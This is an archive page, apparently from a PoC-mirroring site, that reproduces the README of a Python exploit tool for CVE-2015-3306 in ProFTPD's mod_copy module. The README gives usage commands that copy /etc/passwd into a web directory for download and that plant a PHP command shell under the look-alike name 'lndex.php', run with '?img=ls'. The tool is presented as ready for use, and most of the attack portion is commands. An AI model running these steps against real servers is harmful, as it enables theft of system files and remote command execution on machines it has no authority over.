Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2015-3306 PoC — ProFTPD mod_copy模块信息泄露漏洞

Source
https://github.com/shk0x/cpx_proftpd
Associated Vulnerability
Title:ProFTPD mod_copy模块信息泄露漏洞 (CVE-2015-3306)
Description:ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。 ProFTPD 1.3.5版本的mod_copy模块中存在安全漏洞。远程攻击者可借助site cpfr和site cpto命令利用该漏洞读取和写入任意文件。
Description
Tool for exploit CVE-2015-3306
Readme
# cpx_proftpd

PoC by Daniel Aldana for [CVE-2015-3306](http://bugs.proftpd.org/show_bug.cgi?id=4169) exploitation. Bug reported by Vadim Melihow.

###METHOD 1:

usage: 

```
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_SRC_FILE> <REMOTE_ABSOLUTEPATH_DST_FILE>
```

ex:

```
python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt
```

then try:

```
http://127.0.0.1/pass.txt
```

###METHOD 2:


usage: 

```
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_WEBDIR>
```

ex:

```
python cpx_proftp.py 127.0.0.1 /var/www/html
```

then try:

```
http://127.0.0.1/lndex.php?img=ls
```
File Snapshot

 [4.0K]  /data/pocs/fff2904862bd0dfddf7608e594ae5495dcd435c4
├── [1.5K]  cpx_proftp.py
└── [ 589]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.